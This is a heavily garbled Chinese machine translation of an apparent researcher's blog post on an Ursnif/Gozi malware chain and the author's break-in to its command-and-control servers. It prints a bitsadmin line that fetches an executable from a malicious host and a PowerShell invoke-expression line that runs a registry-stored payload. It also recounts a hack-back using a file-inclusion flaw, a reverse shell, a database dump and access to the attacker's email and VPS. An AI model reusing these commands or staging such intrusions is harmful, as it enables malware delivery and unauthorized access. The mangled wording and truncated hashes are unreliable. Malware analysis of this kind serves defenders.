今天,我想分享一個完整的路徑分析,包括一個回退攻擊,這讓我獲得了整個烏爾斯尼夫/戈里齊亞僵屍網絡的完全訪問權限。
換句話說:從簡單的"惡意軟件示例"到"Pwn 攻擊者基礎結構"。NB:聯邦警察已經收到有關這一主題的警報,以及國家和國際CERT/CSIRT(2018年8月26/27日)。攻擊的公司和受攻擊的主機應該已經聯系到。如果你對這個話題一直不知道,那么這意味着,你或你的公司很可能未受到該威脅。我不會公開披露受害者的 IP 。
這種披露遵循道德披露程序,它接近負責任的披露程序,但主要側重於事件,而不是漏洞。由於博客不在我的業務,我寫在我的個人博客上分享網絡安全知識,我將描述一些主要步驟,我采取了擁有攻擊者的基礎設施。我不會透露找到的惡意軟件代碼或惡意軟件命令和控制代碼或攻擊者組的詳細信息,因為我不會把未來的攻擊者新的惡意軟件源代碼准備使用。我的整個"網絡冒險"開始與一個簡單的電子郵件內。名為"Nuovo Documento1.zip"的ZIP文件作為一個看似正常的附件(sha256:79005f3a6aeb96fec7f3f3f9e812e1f199202e813c82d254b8cc3f621ea1372041)。在郵編內。VBS文件(sha265: 42a7b1ecb39db95a9df1fc8a57e7b88659e57b92904ac1fe7cc81acc0d),目前從病毒總(未知 = 尚未分析)完全未知,准備通過雙擊開始。VisualBasic 腳本 (階段1) 被嚴重混淆,以避免對它進行簡單的反向工程分析,但我喜歡去混淆隱藏的代碼(每次它就像個人挑戰)。經過一些努力的時間()階段1被完全去混淆,並准備以純文本解釋。我似乎很清楚,階段1 被控通過對 Microsoft Regedit 運行簡單掃描以及刪除和執行其他軟件來逃避三個主要 AV,例如:卡巴斯基實驗室、熊貓安全和趨勢科技。
階段1,Obfuscation
事實上,如果在目標系統上找不到任何搜索的 AV,階段1 將充當簡單的下載器。具體執行的操作如下:
"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground http://englandlistings.com/pagverd75.php C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe
階段1 正在刪除和執行一個全新的 Pe 文件命名: reouvwkrp. exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493dc51a4bbd3c8a5b05c) 使用位分明. exe 本機微軟程序.BitsAdmin.exe 是一種命令行工具,系統管理員可以使用該工具創建下載或上傳作業並監視其一段時間的進度。在過去幾年中,Anunak APT在銀行欺詐中廣泛使用了這種技術。
階段2 分析(這里遙遙領先)使我進入一個新的全新放置和解密階段。階段3 引入了額外的反逆向工程層。下圖顯示了高熵內的其他 PE 部分。這是解密器活動的標志。
階段2,刪除並解密 階段3,你可能會欣賞附加部分的high Entropy
事實上, 階段 3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) 也包裝了。UPX 算法用於隱藏實際有效負載,因為簽名從原始有效負載更改后,許多 AV 引擎無法檢測到它。最后,去包裝有效載荷提出了許多有趣的特點;例如,它通過逃避技術(如:計時延遲(通過睡眠),循環延遲調用9979141次GetSystemTimeAsFileTime API,BIOS版本采集,系統制造商信息和系統指紋,以檢查它是在虛擬或物理環境中運行。它安裝在 Windows 自動運行注冊表上,以獲得受害者計算機上的持久性。在后台標志中運行時執行了以下操作:
cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6’).Audibrkr))
最終有效負載執行了以下命令,並在目標上生成了兩個主要服務(WSearch、WerSvc)。
"C:\Users\J8913~1.SEA\AppData\Local\Temp\2e6d628189703d9ad4db9e9d164775bd.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:406536 /prefetch:2
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:0000000000000000
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:65800 WinX:0 WinY:0 IEFrame:0000000000000000
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:144390 /prefetch:2
C:\Windows\system32\SearchIndexer.exe /Embedding
taskhost.exe SYSTEM
C:\Windows\System32\wsqmcons.exe
taskhost.exe $(Arg0)
C:\Windows\System32\svchost.exe -k WerSvcGroup
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\system32\SearchFilterHost.exe" 0 552 556 564 65536 560
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:592 CREDAT:209921 /prefetch:2
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
cmd /C "echo -------- >> C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
C:\Windows\system32\WerFault.exe -u -p 2524 -s 288
"C:\Windows\system32\wermgr.exe" "-queuereporting_svc" "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_82b9a110b3b94c55171865162b471ffb8fadc7c6_cab_0ab86b12"
階段3 最終連接到C2s 一旦檢查了自己的 IP 地址。觀察到兩個主要的 C2:
• C2 level_1(對於域和 IP,請選中 IoC 部分。階段3 連接到 C2 level_1武器化。Level_1命令和控制獲取受害者的信息,並提供插件來擴展感染功能。
• C2 level_2(對於域和 IP,請查看 IoC 部分。第 3 階段間接連接到 C2 level_2,以便提供被盜信息。它是一個 Ursniff/Gozi,它通過查找特定文件,獲取用戶剪貼板,並在瀏覽器中對主要網站(如PayPal、Gmail、微軟和許多在線服務)執行主攻擊來篩選用戶憑據。
目前為止,一切都好。一切看起來像我通常的分析之一, 但有些東西引起了我的注意。C2 level_1有一個管理小組,就我個人的觀點來看,這個小組是"漢德制作和漂亮的"年輕",通過HTML的mtheeaning實現,沒有客戶端控件,沒有點擊劫持控件,而不是特殊的登錄令牌。根據Yroi的使命(保護其客戶),我決定更進一步,試圖通過進入整個網絡,並配合地方當局關閉他們,通過獲得盡可能多的信息,以幫助聯邦和地方警察打擊網絡犯罪,試圖保護人民和/或受感染的公司。幸運的是,我在命令和控制中發現了一個包含文件的漏洞,它把我收錄了!下圖顯示了我在攻擊者的命令和控制中生成的反向 shell。
C2 上反向Shell 階段1
現在,我能夠下載整個命令和控制源代碼(php)並研究它!這種全新的C2的研究使我更上一層樓。首先,我能夠訪問本地數據庫,在那里我發現了很多受感染的 IP(與 C2 通信的 IP level_1)。下圖證明,下載的指揮和控制系統有馬其頓方言(西里爾語),根據阿努納克APT報告由組ib。
命令和控制源代碼(狙擊)
下圖表示受害者 IP 中的數據庫轉儲的簡單屏幕截圖(出於隱私原因未公開)。
C2 level_1數據庫
對數據庫的其他調查帶來了新的互聯 IP。這些 IP 正在查詢具有管理權限的 MySQL。至少有兩層C2存在。當level_1將惡意軟件植入物武器化時level_2受害者那里收集信息。由於源代碼研究已經可能發現更多的0天用於對C2,並為了突破C2level_2。現在,我能夠看到來自受感染主機的加密 URL。前面的重要步驟故意缺失。在許多 URL 中,分析人員能夠從攻擊者那里找出一個"測試"連接,並專注於解密此類連接。幸運的是,所有需要的都寫在命令和控制源代碼上。在具體的情況下,以下功能是獲得清晰文本的根本!
URL 解密功能
eKey 是直接在 DB 上,解密功能很容易反轉。最后,有可能想出如何解密攻擊者測試字符串(日志上可用的第一個事務)和voilé,有可能簽入攻擊者的電子郵件!
攻擊者電子郵件:VPS 憑據
一旦"進入"一個新的需求出現了:通過訪問VPS控制面板來發現整個網絡。在攻擊者基礎結構上執行一些活動步驟后,可以訪問整個 VPS 控制面板。在這一點上,很明顯,一般基礎設施圖片*以及如何阻止威脅,不僅為客戶,而且為每個人!
攻擊者 VPS 環境
免費共享這些結果將使供應商(例如:AV公司、防火牆公司、IDS 公司和兒子)能夠更新其簽名並阻止世界各地每個人的此類威脅。我相信,這項工作不會阻止惡意的演員,但至少我們可能會提高我們的聲音反對網絡罪犯!總結:
在這篇文章中,我描述了我采取的主要步驟,使我獲得一個大的烏爾斯尼夫/Gozi僵屍網絡,以關閉它通過提醒聯邦和國家當局(沒有對攻擊者基礎設施執行直接破壞性行動)。威脅看起來結構很好,Docker 容器是為了自動化惡意基礎結構部署而采用的,並且代碼設計得很好。發現了許多層指揮和控制,整個基礎設施可能是從犯罪組織而不是從一個人建立。下圖顯示了 2018 年 8 月的受害者分布情況。目前的主要目標是美國,受害者占47%,其次是加拿大(29.3%)和意大利(7.3%)。2018年8月,受害者總數為數千人。
2018年8月24日受害者分布
在分析過程中,有趣的是觀察到攻擊者正在從一個明顯的"黑市"獲取域名,許多行為者在其中出售和購買"明顯受損域名"(沒有證據,最后一句,只有感覺)。系統(下圖)看起來像公共 API 中的交易平台,第三方系統可以操作該平台,如股票運營商。
明顯域黑市